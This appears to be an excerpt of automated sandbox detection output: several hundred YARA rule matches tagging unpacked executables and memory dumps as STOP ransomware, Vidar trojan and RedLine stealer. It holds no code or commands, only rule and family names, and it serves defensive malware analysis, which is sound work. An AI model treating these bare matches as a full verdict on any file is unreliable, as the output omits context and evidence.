Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.build2.exe.5f15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.381718272.0000000002011000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000000.422829204.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.350781670.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.420520373.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000000.00000002.354896040.0000000000674000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.419588694.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.388953002.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.396728940.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000000.373449176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
